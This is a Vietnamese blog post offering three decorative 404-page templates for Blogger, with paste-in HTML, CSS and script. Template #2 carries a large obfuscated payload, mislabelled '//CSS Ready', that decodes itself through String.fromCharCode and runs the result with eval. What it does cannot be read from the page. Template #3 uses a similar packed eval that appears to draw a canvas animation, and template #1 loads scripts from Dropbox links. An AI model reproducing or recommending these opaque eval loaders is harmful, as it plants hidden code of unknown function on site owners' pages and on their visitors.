Tổng hợp các trang lỗi 404 đẹp cho Blogger

Tổng hợp các trang lỗi 404 dẹp cho Blogger
Trang lỗi 404 là một trong những yếu tố góp phần tạo nên blog của bạn. Nếu có link trên blog bị lỗi thì blog sẽ chuyển về trang 404 này. Nên nay mình xin giới thiệu một số style đẹp cho trang lỗi 404, nếu thấy đẹp các bạn có thể lấy về sử dụng.


1. Page 404 #1

Bước 1: Thêm đoạn code sau trước </head>

<b:if cond='data:blog.pageType == &quot;error_page&quot;'>
<link href="https://dl.dropboxusercontent.com/s/qn5mr56p3yyzwju/bootstrap.min.css" rel="stylesheet"/>
<link href="https://dl.dropboxusercontent.com/s/02z8w7zlf7x5p82/shader.css" rel="stylesheet"/>
</b:if>
Bước 2: Thêm đoạn code sau dưới <body>

<b:if cond='data:blog.pageType == &quot;error_page&quot;'>
<div class="theme-fire">
    <div id="background-container" class="background-container">
      <div id="background-output" class="background-output"><canvas width="0" height="0" style="display: block;"></canvas></div>
      <div id="vignette" class="background-vignette"></div>
      <div id="noise" class="background-noise"></div>
    </div>
    <div class="content">
      <div class="container">
        <div class="row">
          <h1 class="header col-sm-8 col-sm-offset-2">404 Error</h1>
        </div>
        <div class="row">
          <p class="description col-sm-8 col-sm-offset-2">
           Oops! That page can&#8217;t be found.<br/>
           It looks like nothing was found at this location. <a href="/" style="color: #111;">Back to homepage</a>
          </p>
        </div>
      </div>

 
    </div>
  

<div></div>
<script src='https://dl.dropboxusercontent.com/s/m1cjsogan6awc0e/jquery.countdown.js'/>
<script src='https://dl.dropboxusercontent.com/s/9uzit85iai7n9yl/placeholders.min.js'/>
<script src='https://dl.dropboxusercontent.com/s/0qi7d11zioe0h13/flat-surface-shader.js'/>
<script src='https://dl.dropboxusercontent.com/s/xo6qkcyrkkiaghm/main.config.js'/>
<script src='https://dl.dropboxusercontent.com/s/7v0jn787tikjst6/shader.js'/></div>
</b:if>

2. Page 404 #2

Bước 1: Thêm đoạn code sau trước </head>

<b:if cond='data:blog.pageType == &quot;error_page&quot;'>
<style>
body{background:#000;overflow:hidden}
canvas{display:block}
.promo-content{width:100%;margin-top:60px;z-index:1;position:absolute}
h1.h1cimy{margin-bottom: 10px;font-size:150px;text-align:center;color:#fff}
p.pcimy{font-size:50px;text-align:center;color:#fff;margin:0;position:relative}
p.pacimy{margin-top:20px!important;font-size:50px;text-align:center;color:#fff;margin:0;position:relative}
.acimy{padding:10px 16px;border-radius:3px;text-decoration:none;font-size:25px!important;text-align:center;color:#fff;margin:0;position:relative}
.promo-content .button{background:rgba(0,0,0,0.5)}
.button-outline{border:3px solid #cccccc}
@media screen and (max-width : 768px) {
.promo-content{margin-top:160px}
h1.h1cimy{font-size:170px;}
p.pcimy{font-size:33px}
p.pacimy{font-size:33px}
.acimy{font-size:16px!important;}
}
@media screen and (max-width : 640px) {
.promo-content{margin-top:130px}
h1.h1cimy{font-size:170px;}
p.pcimy{font-size:26px}
p.pacimy{font-size:26px;}
.acimy{font-size:15px!important;}
}
@media screen and (max-width : 480px) {
.promo-content{margin-top:120px}
h1.h1cimy{font-size:60px;}
p.pcimy{font-size:25pxpx}
p.pacimy{font-size:25pxpx;}
.acimy{font-size:11px!important;}
}
@media screen and (max-width : 320px) {
.promo-content{margin-top:80px}
h1.h1cimy{font-size:40px;}
p.pcimy{font-size:17px}
p.pacimy{font-size:17px;}
.acimy{font-size:12px!important;}
}
 </style>
</b:if>
Bước 2: Thêm đoạn code sau dưới <body>

<b:if cond='data:blog.pageType == &quot;error_page&quot;'>
<div class="promo-content">

  <h1 class="h1cimy">404</h1>

  <p class="pcimy">Oops! That page can&#8217;t be found.</p>
  <p class="pcimy">It looks like nothing was found at this location.</p>
 <p class="pacimy"><a href="/" class="acimy button button-outline"> Back To Home </a></p>
 </div>
<canvas id="canvas"></canvas>

<script type='text/javascript'>
//<![CDATA[
//CSS Ready
eval((function(){var j=[71,72,66,82,85,60,74,89,79,80,81,87,88,76,65,70,90,75,86,94];var t=[];for(var l=0;l<j.length;l++)t[j[l]]=l+1;var m=[];for(var p=0;p<arguments.length;p++){var x=arguments[p].split('~');for(var b=x.length-1;b>=0;b--){var f=null;var o=x[b];var c=null;var k=0;var e=o.length;var i;for(var d=0;d<e;d++){var s=o.charCodeAt(d);var r=t[s];if(r){f=(r-1)*94+o.charCodeAt(d+1)-32;i=d;d++;}else if(s==96){f=94*(j.length-32+o.charCodeAt(d+1))+o.charCodeAt(d+2)-32;i=d;d+=2;}else{continue;}if(c==null)c=[];if(i>k)c.push(o.substring(k,i));c.push(x[f+1]);k=d+1;}if(c!=null){if(k<e)c.push(o.substring(k));x[b]=c.join('');}}m.push(x[0]);}var u=m.join('');var w='abcdefghijklmnopqrstuvwxyz';var q=[10,92,96,39,126,42].concat(j);var g=String.fromCharCode(64);for(var l=0;l<q.length;l++)u=u.split(g+w.charAt(l)).join(String.fromCharCode(q[l]));return u.split(g+'!').join(g);})('var _$_ef28=["13372D84@u205C1071DH455HqE995@uH*Hk71@uH45HJDGEEH80BT107HJ@iHK35CB@D1019E999DG0C775@iGKvBBH1CGc11C1H>063C775@vGRB>BSG@87@vH(775CGKu1BLGb39EGg59D775DGn@vH%1G{5@u1027Hyi63HUu1HD067H\'CH8B#GBBU039EBCHhvG@39GfuGPEGdBHGrDG,vG5@uHw047GXBQ1B%7G-u963D971C835EGKiG4@vG5Gy0BI1HzHi1Hs999E727CGQ@i1G`u1Ga@vGq@u795@i791D775@iHQ9BRDHI63HnEGKiG @v1GsCH8043D1067H\'@i1HE27@iG7i1BFBP1GaD891H/@iB!GLE795BRB\'DBC803@v7BOGkE835CGrCG35@vGb59CH-79B.iG7vB@CH|i999EG4GN87CGmHJ@iB(71CH)95HyvGMG0EH{1G2083EG(Hl5CH(Gb11Hl5D1HE27C787H7799H7771GW95HnCGMHjG!@vHABQH455B @vHmH&727@u843EBC10BHH+79@i831GjB@C101B6@iG4H\\87GN99B\'HS1BEi831GjBB@vHmGb11CBBD1BQH;87CHQ9CGd99BD@iGlEGD5@vG5CB0B&GA5HpH[@i843EGm1BD@uGnCGe15EGcGzDH,Hx011@iHhi100GUGQD791HyiGrEG D1GI@v1B%1067H1DGHCBCGDH^B?27B.iGSD811HrCG%63CBBEG5@uHABW1H:07EHi7G-v795HyuGOG0@uGA59CH-67E1047CB*H*63Gfu859H/B HoEHiGJBDDGnG&@vGA59HTB,047EB*HL063CH0871CGbBVH%GPHWi639CH}i6H]H6DGc39EBAHTHz1055@u1B)Gh43DH%1BEvH5H(H.059CH&H01047B-843HYHDHO039HuEGCG\'@u75H3E1019CHI6GU1091EGMGD5DG@59HTG:v771DG7u907@v987DG4EB0995E1H<59DG.063Hl5EGcGvuH4Hk11DHhi100GU7H[E767H?HjG!DHA059CH5Gg03@u999DG8uBNG0CH{1G2BEv7H"@uGw7EH#@vGe15HT059CGB39@iGLEG35@uG@GzDH*39C1011@iHhvH0G9vH)67H7G4@uG@BIH-59D1HzGF03E999Hn@uGEEGlCG4DG@59DH.B,047@i999E987CGe03@i871CG5E1B#GPE835CGrEHK35E1H:07D759H2vGe15@vG5C783HViGB59C10H[@u839@v72G+5@vG@59Gx10BSH5Gg03HVuGp@uG#@i635HPiG35@iGA59Gy079EGHHqE1B#G!@iH.063H$055B>11DGgBTH-79E8G/C635G&CH{1G208H9@i843B.uGC15DG@BSH-63CHL055B>11@uGF63Gy083CG8u635HPiG"B>GviHM015DH,Hk11DHm935CH455D1011CHCHEBV763HnDGMBGCG;6G/CG @u1GICH5B$G35DHABK106Ht59DBBC759DH+91CH+79E831H2iG4@vGB59DH-79@uGT@u1BEu831B7G C1G]C1083DGd99@vGkHn@iBNGOGc07@vGq@iG"@v1Gs@iH5B$G,uHwBWBAH\'B @vG,u727@v847H?GD5@vGAGzHuCGG67B>39DH&GkDGd91@vGl@uBNG @i1G<u1047@iB$G35CH.0BS1B%Gb07B>63EGPBDCG>BGDGKvG;GD5@vH|v1GI@uHhuG@07H1EB(79@i843CGm1C783D7BH7BH795HWiGMG;GA07@iGL@iG4CG5@iHvBWGc0Ht0HGv839DGw7BRGj763EBC10BHGED635CG,iGcGzD1BK987CGD5DGHDH+39C106Ht31HoB4vG>635H6@uG@39EHi1GIB?5Hp47CHhv1019EH8HsG.019B<CH;95CH;63EHN5DG6uBGD6Hx099@uHN9@i639HoEG@39CHmH.Hz1055D1B)Gh43EH&1083E1BKBAHTHO047@u999G}063CH(871CGBBVH&G*@u1HD067H\'C995DH%G@43E1039EGJCH+BOG6i1071@uH,55GjB2079B-G7uG0CH|i1G<i1063GX055B GfvH%HvG:v77HZG"B>Gvu1079B<CG6u635EB+BEvG(@u1G$C1GsDB!H*55Hl1EHi1063Gx1083H?779C727G&EG5DH-83@iG8uBNG35CG5Gu999CGc59EH&7G-i907@i98G+5@iHv059E1051B?55DH%Gq@v99Hp79EB(67HS99Hp7HZ771H_vB&1083EH)67HFB2BEiG9v8HBB?99E639E639E1BWGb39Gfv783EH51B8GG63EGG63B?83EH51HsHAB9Hz999CB$Gh03@u859H\'B H6CH0727C843EGd07@u1HO039C995CHjGABU039EGJEGd91G1E1071@uH,55DBCB+G:u84H9@iG0@uG@BIH-63EH*55Hl1Gfi1BQHAG:i77H3@vG"D1G]E107HJDG>635@vB+08H9CGw7CGC15EGc59C783DH&HL055D1011@vHC063CH-83GN7H3EG0EG@Gvv1083B4iGO1G$@u1G<v987H\'D1011@iHhuHiBCGQ@i907@v987DGD5@v783DH*63EH*39D799@G?DB&1BEiGTCB2079CGkE8HBD109HUu6Hk31DGb39@uH(H-47C1BFGGBT1043CHj1BEu1047Gfi783@vH8015CH*Hk11CH0935DHHHR011CHC06HGuGQ@v1HD067E1H @iHjGc43H/G\\3H?1091DGO1071DH455EH+55GXGa@v931DH&H455E1B#GHCGi55@vH*HaD891D1039@iHjB5HQ1C775HqE803@iGoHrEG6i1059EB@DGB63EHM015@uGqC1GYD1GZ@v931EHjH,55D1063GN63EG#@v6H`B/EH,59B>03Hg91E831DH)87@uGSB?6Ht47CHKH`@i6BMG"@i1G]E1063GX055B H1DHjB3108HGuG7iG E1GsE1083EHI7H3C10BIGb87CBAHWvGRC6H`@u991E1BFH(HH027HrDGEHPuB1HL059CHmGm5C831@v7H!CGS@u1HRH:11@v1H>063G1@i6H`CG4DG5DH.BQHe055Hl1CHC063CH.079CBC84HGvG4CGB59Gu1079H2i771@uGiBVG@87Gfi835G1EBN6BM991E1BZH(He027@u835CGlHPv99G_HdHsGm9@v831CH)87@iGSEB*GG75B>39EGn@v6H=5D1BQG!@uH-63GX055B EHmH%HwBEiG(DG C1GsB>83Gj771@vH+59D1H:87@uH(835@iG;6H=5D991D1BFHmHH027@v8G/@u635E995H$059EBACBJ803@i831CH)87C787EGi31@vH(1007EHjGEC6H=5@vGe15EG5CHv063G}BF1011CH01HE83E1G:v843B71G$D1GIE1G:u779EBJ1059EGc87CHi835CG6uBGEGMH&G!@vH.B9BK999EBPGh03@u859H/Hl1EHhuH(759E763DHNHp99Hyv6H]CHhvGA39GfvH.04Ht55B>43EGh43EH%1083C1BKBAGuB*1GYCB@H2u843HYHDB,H D1B#GB43H/@uGLDH{Gp@vH+91@vGRE995DGe79E783C991CGF11CGb39E919DBPG35D759D7BT835DGrC1071@vH,55@i727C1GYB>39DB2043Gj84H9E1BZBP1GZD759GWBH775GN95BRDGkB4uGKv1007DGG55D75H3D1071@vH,55@iH+23CGHEBJB:75H?1031CGFHx011DG0HFGQDGe15@uGA59Gu1HzBPG35GxHhuGgHx011@uG,v835CGi2H9@u839@uH+31EBAH\'Hl1@uGe15BDHqB>23@u771@v7BXG9iBJ1091@vGrDBN995CGh79C963Hg59Gj102GU843D843DGw7BRDH)H[D851CB(55B?35E1H<71DH09BMH@755H7831GW55@uHhvG@Hk03C9BMH@755D727@i9BXHX7@iG35DGb59CHvBK987@vG,v963@iGd23B-971DHw079E7H"DGi5G_03B6EGqC779D1G=v1039D999EH@GTD1G`i1039HVvH@G9i775D72G+5DH{1GIE1047EB$Ge15E96HGv102HGv971DHv083Hc771Hq@u1G=u10HaEGLE779D1G`u1GZ@u1043D775EGi55GXGZB?43CGoDG9i8BMG;BGDGO995@uGC79@vHw059DH%1HRB)1027Gfi931EH&1083H6EH0GHH?755CBBB"H6@iB$7BS755Gj771H2v1G`i1Ga@G?@vG4@iGA59CH.015C1067EHm775EBC1G$E1GI@v1H>067H1GVBX727C803@u791DGkCHI71@uHI55C775H2v823@v7BO747B<CBC811E811C747E775Hg55E7H"H_vG.0BT1B%H|u1G<i1BWGc07EHmBJGS@i803EGpH7771DH;55@v763D755Hr@uGEEB=H%1G[H6@vGc39DH(947DH{999DG0B7G7v1BZH,Ha@v759H\\91EB0795E775GV99@uGkHWvGEB/EH&1079EHA059DGh55C1H<2Ht03CGtDG8iH}i8HB@i639@u1007C1067E1039HuDHjGc43H/H2u1G|C1GZEHX7D1035DGA39B\'B71G^B>79CGoCGdBOGKv1B8GF63B?67E1055H/HFH#@uG,uHwG|E1GZD1H<35@i7BV76H9E767@vB(59B-1G^E1079HF779@uGd35C1H:39EGoC7H"HS10BMGB39@i8H=9@u109HUi639E1HfB9039B/DG39@vGGHbD1B8987H\'DB*891D10Hx063DGqB>35CGB39B<B.v1G^E1079CH)63DH+BOGnB>55CBACGC6Ht55H\'HS907@iBPG35DHvHfBL1B)H@1BFGqE10BMGcHbE771B.u907C987CGD5C783C1G|E103B6D1043D10BMGtH7767@vH)59HY03G_07HZ779CGi35EGb39EH;BXGm5CG9vGpDG8vBGD8HB@v6Hk07D1B,H DH%10G\'DBCGB39CGb63EGJHY091EGKu995C987H\'@u10BXH,59HqCGQCB&1043HuC1067B?35DHi10HxHE83C1011DH(1B#875HoCGg35@iGgBYBQ863E1BEu8BHB*759DH)55@iB=987H\'D1071EH,BI755CGoHrEG>995CGC7H3DGQD995CH*39E1071G}0Gvv1011EHiH&867B>BU039EGh03D1079@uB!GLD755@u799@u999C755GV63HnG1B"E1H:87Gfu727C84H9@u803E791BDDG%31@vGb39CGF59EGHEBJ9BT971HWuG%55EGgBSHmH%759E763@i8G)HoE1H<BUBKGP@vHN9@vH}v63HUi1007B?67H\'EB=H%GB43H\'@uGd55DGgBSH0B!GJCGi91CGEEB@C1G{9G&D7G-uH#EGD5@i783B;1HsGA31DG.075EGbHa@iGG75DB0G@39H/Gfv1055@u947Hl9@i999DG35@v7H!@uGm9GN6H9C767GW99HyuGlCBBDBACGc11B?15CB!GHHq@v907C987G&CB0995D1HsGB31C75H3DB@D1H:39HViH@B@CB3G@39C1039CGg55E887H1CGc11EBBEH&BJ787H2u799GV63GV67Hc799C835EGOHj101H^D1027@vG*@i791BDDG6iGnH6@vG@39EH(1GsHoH1E10Hk11@uG4CG(BRD8H=5EGRC995DHe0Hk71H$059Gy075HlB6@iG0HqE843DH+75C1019CB&G0HyiGM995CH43Hp71CHHG<u1H>003CGb11Hl5EB!GHDGd15B>03CG@11E1B%H&8H=9@vH}i639C6Hk07@i1B903H^CH%10G\'H_vHMBFHi987CGh03EGJ@vG#C635EGb07@uHX7DGC19B;1027Hc747H7795CB:27E843@u843C84H9BRH776GU1091CBN6G)EBNHhuGA39@uGg59Gy047E1067B?59DBBDGLH\'@uHC075HF1BLGbBYHsGtC763HrDGl@u109HUiBGE6H]E1Hf067H\'E995EGe19CH@103H3B"@vH&Gg47@iGt@uGiBHG%BXHeBFGi19HqCGw7E1BL1H:39DHCG]DHhiGFHx011@vG4BD@vGlB?75DBBDGA31DHiHX7CH|u779D779EGpGj10BHG6i635B?31CGB39H1B"@u963CGi19D727@u9BXHw059CGh03@i1HzB5Gd19@uGo@u8H=5@uG>H}u639CBGC639C6Hk07C1HO03H^@uH%Gc43D10HbD995HoDHiH,55EGP@vBJ1091CGEHuCH&1G[Hl1EHhv1043C991@vH*31D867EGG35E1047E1043B"@iGb63EHi915@iH5GF55@v98G+9B>43H/DG*@u755HVvHi1059EGD9D1039E987@vGCG\'E779@uGG67@vH&755D8G)CHM063C1079@vHv007@uGA31HoD931@vGh83@u1BWBACGHGj755@u1H>Hd031@iB$7BI7BOGT@u791@v747B\'HF791C747C775EH;91D783@v795@u755Hr@iGrC995EHj1G[B>07EGA31DHhi927CHi995@uH%B5Gm1EGT@v791EGTDB@@iH{B&Ge15B\'CGd15@iGF19C1011EBBE1B#GpB4vGEDB1GC79@iH-11@u1BL1B)991H$BL867E1B)1035CH51H<BIGbBT1Hs915@u1BKHCG=iB!G@43H\'Gj843CH)55H6DGA11@i1B%Ge03E1B8755C8HBDH}vHKBYHDHO039B;GD9E10BU0Hb@iB+G=iB@G\\3DG#HPv995EGh79Gu10BVHH071H1DGtHnEGlC995DGC79EB3H%1GYC10HxHdBWBPGe03C75H3CB@@v1G{9CG4D7H!Hg9HJCGd15EHmG@11D1H>063GN87EHQ9@vGkHrCGMB1Ge79CHwBZ1043EH%BPGh03D75HZG39CB=1027EB(67CHQ1GxB:BO795@uGoBDEGEC1071EHLBZGi59E995@uH,31C100GU843DH)91DB3823GW71H_iH#CGC15E783DHMH<BI759H7GD9B/D1027H\\67GW91GxB:99DGpDH)67DH;91Gu799HnCGnHuEGe79@uH.059CB1H431H1EHX7B"E99G_BLH0775@iGd59HuDHH031GfuGoHn@vGRCB1GC79EB3Hj1G|C10Hk59HoD987CH%BAC759DH;79EB@@i1G{9@uG0CBJGS@i799B\'H\\79DBB@uH(Gb11E1B%1HEH!DGmH3@i763HyuG%71G}055H?H|iG*DHhvGB39DHi1G2BLHi10Hk11CGD5HnCGEEB@DBBDGc31DBA@G?DH|i779@v779DH)63H2v1091EGO635H6CGB39@vGgBV963@vH+19D727@u971D783@vB+GYB?75@vGLE1019GV63HrD635CGnCH}iHK35B;1BQ1G[C1HR003B"EGC43D1BZH(GJEHN9CBGE6H]E1007D1B,H CG3HpBU039CBCHhuGG43@u1HzGtHS10BOGlB>55EGF51C1067@uGF59DH%859H/E1019C1G^DHjGb43E1039E879C1G=u1035CBA@G?CHhi1H<BU047EGkBDG1DH8HR003EH*63CBAG\\3D8G/D1Hd063Gfv1047@iGJ@u835DGE@vH8031GfuH*55C759E763D8G)@uB2GYCB@@uGJ@vG8u635CGC19B/E1027D771C771D8HBEBGD639C639D1Hf067H\'Hu@vG3Hp43D1039H2v1043D103Hp55DGF59EG@8Ht03G\\3Hc1091CGR@i1BFGgBIGF63EGPBDC6HB@v~G0@i1019~1015CGA59~Ge15D1019~Gd91E639~063DBBE1019~GE@i10~@iGC15~19C1H<39~727EGQ~H=9@v635~727@u843D727~7@vG3~GC15@~27C84HG~75H3@i1~35CGR~H%1015~@uGR~0Gvi1~H&101~Hj1015~1H:59~HK35@~Gw7@~835@i639@~H;63@~07H3@~Gn@u~G]@~055@v987@~Gn@i~uB5727~101Hp~H|u10~H|v10~1B#10~Gh1~639@u635~1Hs10~1043B>~727@v843~0BS783~7BS763~Gr@~759Hq~GnE~@iH)~GnD~B5763~843@v727~639@i635~787@v727~775@v727~3H2i~@uH)~@uH;~@iHH~055@u987~039@v999~079@i783~E7BV76~0BI783~0BM987~5@v987D1~BF987@~039@i999~H{10~1019E10~72Ht~1BQ10~H1@~BAC10~B!10~727B?~H_u~BC763~639C635~HI9~639D635~BJ763~B(63~759E727~639E635~059D783~759C763~@uB3~59E783@~843@i72~@vB3~CHA~BV783~019@v99~055D987~CHe~039D995~27@i787~27@v771~907E987~@i987C1~1063@i~10BT~B?39~BA@v~727@v7~BP10~727C10~987D10~783C10~783@v1~@u1039~BA@i~B?03~@i727@~9@v727~987C10~1047@u~B>31~@iBC~995@u1~3Hq~019C10~727@u7~043E10~BM63~015@u1~@iBJ~1043@u~B01~35E639~Hm1~007@v1~B#7~HqD~3D727@~B$1~727@i7~9@i775~639@v6~987@i1~B11~835C63~067@v1~@v635@~B(9~B81~C727@v~EHw~9C639@~@u999@~@u835@~759C72~CBJ1~9D727C~63C727~B-7~39D639~9@i995~@v727@~35E635~39E999~39D727~@vBC~0BV1~987@v1~007@u1~DBC7~1031@~BAE~1063C~39D10~@u101~BAD~@i835~C1031~9B?~@u727~@v835~003@u~7@u10~@v995~783E1~783D1~39@v1~E835@~047@v~1019D~1019@~BG@~E1011~1063D~D1059~063@v~987@u~015@i~999@u~@v775~727C7~043@i~999@v~999C1~067C1~DBJ~E727@~@u995~783@i~995@v~999E1~783@u~C835@~7BI~9C999~C727C~055@i~067D1~791E7~E995C~@u775~995@i~@v10~@i10~1075~1003~1015~727D~D835~083@~055C~1099~91@i~59@i~727E~047D~031E~35@u~635D~91@u~987E~063E~C791~59@v~63@u~43C1~59@u~031D~71@i~39E1~055E','1099D639C639E1075@u1019E1039D999D1043@i1075@i783@u987@i999@u999@i875D1071E1003@u103G&63@i903C1019D1059C1063G(03C1039D1003C1055C759@i727@i755E1055C1003G(5G&1G&87E1003E755@u775C727@i1043C1039E1055G(03G(59E101G&87G(03C727C763E835E639E639C1019G(3G&19G(63@i759@u763@v835D","length","char@ut","split","fromCharCode","G+6880G+6230=_G,G+2803=_8418G+G*=_2803"G#6736G$G.G!0G#8010=/[G)1G)2G)3G)4G)5G)6]/G$G-=2G$4504=_G.[G"2]](_G.[G"1]]-1)G$G,G$5285=_G.[G"3]](_8010)G$4211=[String[G"4]],isNaN,parseInt,String];_5285[1]=_4211[_G-+1](G 1])/21)G$8418=(_G-==7)?String:eval;_G,G!5];_11=G 0])/G 1]);for(G\'=3;G\'@l_11;G\'++){_G,+=(_4211[_G--2]((G G\'])+G 2])+G 1]))/G 1])-G 2])+G 1])-1))}G$6230G!6G#8506G!7];function G%a){_8418(_2888);G%_G*);_G*(_8506);G%_6230)}var _2888G!8G#G*G!9];G%_4504)~_4211[_G-](_5285[~=G"~_$_ef28[~]G$~;var _~_2803(~9@i10~_6736~@v10~@bx4~1017~","_~2366~1347~7960'));
//]]>
</script>
</b:if>

3. Page 404 #3

Bước 1: Thêm đoạn code sau trước </head>

<b:if cond='data:blog.pageType == &quot;error_page&quot;'>
<style>
html, body {height: 100%;margin:0}
canvas {background: #000; display: block; height: 100%; width: 100%;}
.promo-content{width:100%;margin-top:60px;z-index:1;position:absolute}
h1.h1cimy{margin-bottom: 10px;font-size:150px;text-align:center;color:#fff}
p.pcimy{font-size:50px;text-align:center;color:#fff;margin:0;position:relative}
p.pacimy{margin-top:20px!important;font-size:50px;text-align:center;color:#fff;margin:0;position:relative}
.acimy{padding:10px 16px;border-radius:3px;text-decoration:none;font-size:25px!important;text-align:center;color:#fff;margin:0;position:relative}
.promo-content .button{background:rgba(0,0,0,0.5)}
.button-outline{border:3px solid #cccccc}
@media screen and (max-width : 768px) {
.promo-content{margin-top:160px}
h1.h1cimy{font-size:170px;}
p.pcimy{font-size:33px}
p.pacimy{font-size:33px}
.acimy{font-size:16px!important;}
}
@media screen and (max-width : 640px) {
.promo-content{margin-top:130px}
h1.h1cimy{font-size:170px;}
p.pcimy{font-size:26px}
p.pacimy{font-size:26px;}
.acimy{font-size:15px!important;}
}
@media screen and (max-width : 480px) {
.promo-content{margin-top:120px}
h1.h1cimy{font-size:60px;}
p.pcimy{font-size:25pxpx}
p.pacimy{font-size:25pxpx;}
.acimy{font-size:11px!important;}
}
@media screen and (max-width : 320px) {
.promo-content{margin-top:80px}
h1.h1cimy{font-size:40px;}
p.pcimy{font-size:17px}
p.pacimy{font-size:17px;}
.acimy{font-size:12px!important;}
}
 </style>
</b:if>
Bước 2: Thêm đoạn code sau dưới <body>

<b:if cond='data:blog.pageType == &quot;error_page&quot;'>
<div class="promo-content">

  <h1 class="h1cimy">404</h1>

  <p class="pcimy">Oops! That page can&#8217;t be found.</p>
  <p class="pcimy">It looks like nothing was found at this location.</p>
 <p class="pacimy"><a href="/" class="acimy button button-outline"> Back To Home </a></p>
 </div>
<canvas id="dangbui"></canvas>

<script type='text/javascript'>
//<![CDATA[
eval((function(){var o=[88,65,90,70,80,71,79,75,94,60,87,89,66,74,81,86,76,82,72,85];var l=[];for(var i=0;i<o.length;i++)l[o[i]]=i+1;var b=[];for(var c=0;c<arguments.length;c++){var w=arguments[c].split('~');for(var e=w.length-1;e>=0;e--){var x=null;var j=w[e];var t=null;var r=0;var h=j.length;var k;for(var a=0;a<h;a++){var f=j.charCodeAt(a);var d=l[f];if(d){x=(d-1)*94+j.charCodeAt(a+1)-32;k=a;a++;}else if(f==96){x=94*(o.length-32+j.charCodeAt(a+1))+j.charCodeAt(a+2)-32;k=a;a+=2;}else{continue;}if(t==null)t=[];if(k>r)t.push(j.substring(r,k));t.push(w[x+1]);r=a+1;}if(t!=null){if(r<h)t.push(j.substring(r));w[e]=t.join('');}}b.push(w[0]);}var u=b.join('');var n='abcdefghijklmnopqrstuvwxyz';var v=[10,96,39,92,42,126].concat(o);var q=String.fromCharCode(64);for(var i=0;i<v.length;i++)u=u.split(q+n.charAt(i)).join(String.fromCharCode(v[i]));return u.split(q+'!').join(q);})('X6_$_4a68=["call","dangbui","getElement@syId","2d","getContext","widX3inner@qidX3height","inner@yeight","@kIX4andom","floor","x","yX4X4@lrowth@saseX4@lrowX3rMax","alpha","update","prototype","spliceX4ender","begin@kaX3arc","fillStyle","hsla(",", 50%, 1%, ",")","fill","globalComposite@mperation","destination-out","hsla(0, 0%, 0%, .05)","fill@xect","lighterX4equestX lengX3pushX4esize","on","webkitX0X mozX0X oX0X msX0X setTimeout"];(X\'X6a,b,c,d,e,f,g,h,i,j,k,l,m;c=documentX-2]](X.1]);fX(4]](X.3]);h=4;gX(5X!6]]/h;dX(7X!8]]/h;k=MathX-9]]@e2;b=[];j=30;i=0;lX+o,n){X1MathX-11]]((MathX-10]]()@e(n-o+1))+o)};aX+p,q){X&2]]=pX%3]]=q;X"=0.1X%5]]=1X%6]]=X&5]];tX#=(g+d)/7X/X&8]]=1};aX-20]]X-19]]X+r){X6s;s=(tX#-X")/tX#X%6]]=0.1+X&5]]@es;X"+=X&6]]X%8]]=s;if(X">tX#){X1bX-21]](r,1)}};aX-20]]X-22]]X+r){X)3]]();X)4]](X&2]],X&3]],X",0,k,false);X)5]X,26]+l(i-80,i+80)+X.27]+X&8]]+X.28]X/X)9]]()};e=X\'fX*0]X,31];X)5]X,32];fX*3]](0,0,g,d)X/fX*0]X,34]};m=X\'X6r;X2X*5]](m,c);e();r=bX*6]];while(r--){b[r]X-19]](r)};r=bX*6]];while(r--){b[r]X-22]](r)};bX*7]]( new a(l(0,g),l(0,d)))X/i++};$(X2)X*9]](X.38],X\'gX(5X!6]]/hX/dX(7X!8]]/h});X2X*5X5(X2X*5X!40X5X$1X5X$2X5X$3X5function(t,u){X1X$4]](X\'X1t(+ new Date())},1000/60)});m()})X-0]](this)~@hnimation@jrame","~]]=windowX-~X&4]]~hisX-17]]~windowX-4~;X&~thisX-1~function(){~=cX-~fX-2~X-3~=function(~]=X.~[X.~_$_4a68[~;X1~@xequest~return ~window~th","~","r~]]||~var '));
//]]>
</script>
</b:if>

1 comment

:v
;3
:)
:D
:P
:*
:`
:♥
:O
-_-
:"(
:H
:(
:Z
:T
:<